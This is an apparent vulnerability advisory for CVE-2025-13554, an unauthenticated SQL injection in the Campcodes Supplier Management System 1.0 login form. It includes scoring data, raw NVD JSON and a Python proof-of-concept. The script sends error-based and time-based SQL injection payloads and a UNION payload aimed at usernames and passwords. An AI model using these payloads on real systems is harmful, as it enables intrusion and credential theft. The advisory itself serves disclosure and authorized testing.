Security Vulnerability Report
CVE-2025-13554 CVSS 7.3 HIGH

CVE-2025-13554

Published: 2025-11-23 15:15:46
Last Modified: 2026-04-29 01:00:02

Description

A security vulnerability has been detected in Campcodes Supplier Management System 1.0. This impacts an unknown function of the file /index.php of the component Login. Such manipulation of the argument txtUsername leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Note: the 7.3 / HIGH figure is VulDB's secondary CVSS 3.1 assessment. NVD's primary CVSS 3.1 analysis (see the raw JSON below) rates the same issue 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), and VulDB's CVSS 4.0 vector scores 5.5 MEDIUM. For prioritization treat the NVD primary rating as authoritative: this is unauthenticated SQL injection in a login form, reachable over the network with no user interaction.

Configurations (Affected Products)

cpe:2.3:a:campcodes:supplier_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Campcodes Supplier Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following script is a detection proof-of-concept, for use only in security research and against systems you are explicitly authorized to test. It confirms the flaw with error-string and response-timing heuristics (either can miss a vulnerable target); its UNION-based "extraction" step assumes a column count and a `users` table that the advisory does not document, so it must be treated as an unverified probe rather than a working exploit.
python
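#!/usr/bin/env python3
"""
CVE-2025-13554 PoC - Campcodes Supplier Management System SQL Injection

Vulnerable Parameter: txtUsername in /index.php Login Component
CVSS Score: 7.3 (High) per the VulDB vector; NVD's primary CVSS 3.1 rating is 9.8 (Critical)

Usage:
    python3 poc.py [http://host/path/index.php]

The target defaults to ``target_url`` below when no argument is given.
This script only *detects* the flaw, using error-string and timing
heuristics measured against a benign baseline request. Run it solely
against systems you are authorized to test.
"""
import sys
import time
from typing import Optional

try:
    import requests
    _RequestError = requests.exceptions.RequestException
except ImportError:  # lets the pure helpers below be imported/unit-tested without requests
    requests = None
    _RequestError = OSError

# Default target; overridden by the first command-line argument in __main__.
target_url = "http://target.com/index.php"

# Seconds the time-based payloads ask the database to sleep.
DELAY_SECONDS = 5

# Substrings that commonly appear in database error output. "warning" is very
# generic, which is why _find_sql_error() only reports an indicator that is
# absent from the benign baseline response.
SQL_ERROR_INDICATORS = (
    "mysql_",
    "sql syntax",
    "warning",
    "error in your sql",
    "unclosed quotation",
)

# Time-based blind payloads, one per DBMS dialect. The advisory does not name
# the backend; the target is a PHP application (/index.php) and the error
# indicators above look for MySQL output, so the MySQL form is tried first.
# The T-SQL WAITFOR form is the one the original PoC sent and is kept.
TIME_PAYLOADS = (
    ("MySQL", f"' OR SLEEP({DELAY_SECONDS})-- -"),
    ("MSSQL", f"' WAITFOR DELAY '0:0:{DELAY_SECONDS}'--"),
)


def _login_form(username: str, password: str = "test") -> dict[str, str]:
    """Return the POST body of the login form with *username* injected.

    Field names (txtUsername, txtPassword, btnLogin) are those of the
    vulnerable /index.php login component named in the advisory.
    """
    return {"txtUsername": username, "txtPassword": password, "btnLogin": "Login"}


def _find_sql_error(text: str, baseline: str = "") -> Optional[str]:
    """Return the first SQL error indicator present in *text* but not in *baseline*.

    Comparison is case-insensitive. Indicators that also occur in the benign
    baseline response are ignored so a page that always contains, say, the
    word "warning" is not reported as vulnerable. Returns None when no new
    indicator is found.
    """
    haystack = text.lower()
    control = baseline.lower()
    for indicator in SQL_ERROR_INDICATORS:
        if indicator in haystack and indicator not in control:
            return indicator
    return None


def _delay_confirmed(elapsed: float, baseline: float, delay: float = DELAY_SECONDS) -> bool:
    """Return True if *elapsed* exceeds the benign *baseline* latency by about *delay* seconds.

    Measuring against a baseline instead of a fixed threshold avoids flagging a
    server that is merely slow; the 10% tolerance absorbs timer and network jitter.
    """
    return elapsed - baseline >= delay * 0.9


def _post(url: str, data: dict[str, str], timeout: float) -> tuple[str, float]:
    """POST *data* to *url*; return (response body, elapsed seconds).

    Raises RuntimeError when the ``requests`` package is unavailable and
    requests.exceptions.RequestException on connection failure or timeout.
    """
    if requests is None:
        raise RuntimeError("the 'requests' package is required to send HTTP requests")
    start = time.monotonic()
    response = requests.post(url, data=data, timeout=timeout)
    return response.text, time.monotonic() - start


def test_sql_injection(url: Optional[str] = None) -> bool:
    """Probe the login form for SQL injection; return True if it looks vulnerable.

    Steps, all against *url* (default: the module-level ``target_url``):
      1. a benign login (non-existent user, no SQL metacharacters) to record a
         baseline body and latency;
      2. a lone single quote, reported if it surfaces a database error string
         that the baseline did not contain;
      3. the time-based payloads in TIME_PAYLOADS, reported if the response is
         delayed by roughly DELAY_SECONDS beyond the baseline.
    Returns False when nothing is detected or a request fails. Both heuristics
    can miss a vulnerable target, so False is not a clean bill of health.
    """
    url = target_url if url is None else url
    print(f"[*] Testing target: {url}")
    try:
        baseline_text, baseline_elapsed = _post(url, _login_form("nonexistent_user"), timeout=10)

        print("[*] Testing basic SQL injection payload...")
        body, _ = _post(url, _login_form("'"), timeout=10)
        indicator = _find_sql_error(body, baseline_text)
        if indicator is not None:
            print("[!] SQL Injection vulnerability confirmed!")
            print(f"[!] Error indicator found: {indicator}")
            return True

        print("[*] Basic test completed, trying blind injection...")
        # Headroom in the timeout: SLEEP() runs once per row the query examines,
        # so the observed delay can be a multiple of DELAY_SECONDS.
        blind_timeout = baseline_elapsed + 3 * DELAY_SECONDS
        for dbms, payload in TIME_PAYLOADS:
            _, elapsed = _post(url, _login_form(payload), timeout=blind_timeout)
            if _delay_confirmed(elapsed, baseline_elapsed):
                print(f"[!] Blind SQL Injection confirmed ({dbms} payload, response delayed by {elapsed:.2f}s)")
                return True

        print("[*] Vulnerability check completed")
        return False
    except _RequestError as e:
        print(f"[!] Request failed: {e}")
        return False


# Not a unit test despite the name: stop pytest from collecting (and running) it.
test_sql_injection.__test__ = False


def extract_data(url: Optional[str] = None) -> None:
    """Send a UNION-based payload and report the response size.

    This is an unverified probe, not working extraction: the six-column UNION
    and the ``users`` table come from the original PoC and are not established
    by the advisory, which only names the injected parameter. The column count
    and table/column names must be confirmed against the specific target before
    anything can be read from the response; until then the only signal is
    whether the body size differs from a benign baseline.
    """
    url = target_url if url is None else url
    payload = "' UNION SELECT NULL,NULL,username,password,NULL,NULL FROM users--"
    print("[*] Attempting data extraction...")
    try:
        baseline_text, _ = _post(url, _login_form("nonexistent_user"), timeout=10)
        body, _ = _post(url, _login_form(payload), timeout=10)
        print(f"[*] Response length: {len(body)} (baseline {len(baseline_text)})")
        # Parsing the response is target-specific and intentionally not implemented.
    except _RequestError as e:
        print(f"[!] Request failed: {e}")


if __name__ == "__main__":
    # Optional first argument overrides the hard-coded target URL.
    if len(sys.argv) > 1:
        target_url = sys.argv[1]
    print("=" * 60)
    print("CVE-2025-13554 SQL Injection PoC")
    print("Target: Campcodes Supplier Management System 1.0")
    print("=" * 60)
    if test_sql_injection():
        print("\n[*] Vulnerability exists, proceeding with data extraction...")
        extract_data()
    else:
        print("\n[*] No obvious vulnerability detected")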

References — see the references array in the raw JSON below: the GitHub issue arpcyber060/CVE#3 (tagged Exploit, Issue Tracking, Third Party Advisory), the VulDB entry 333321 and its submission record, and the vendor site campcodes.com.

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13554", "sourceIdentifier": "[email protected]", "published": "2025-11-23T15:15:46.217", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Campcodes Supplier Management System 1.0. This impacts an unknown function of the file /index.php of the component Login. Such manipulation of the argument txtUsername leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, 
"cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:campcodes:supplier_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "836654A6-0614-4B2F-A556-E005AF4C7DE1"}]}]}], "references": [{"url": "https://github.com/arpcyber060/CVE/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.333321", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333321", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.696515", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.campcodes.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/arpcyber060/CVE/issues/3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}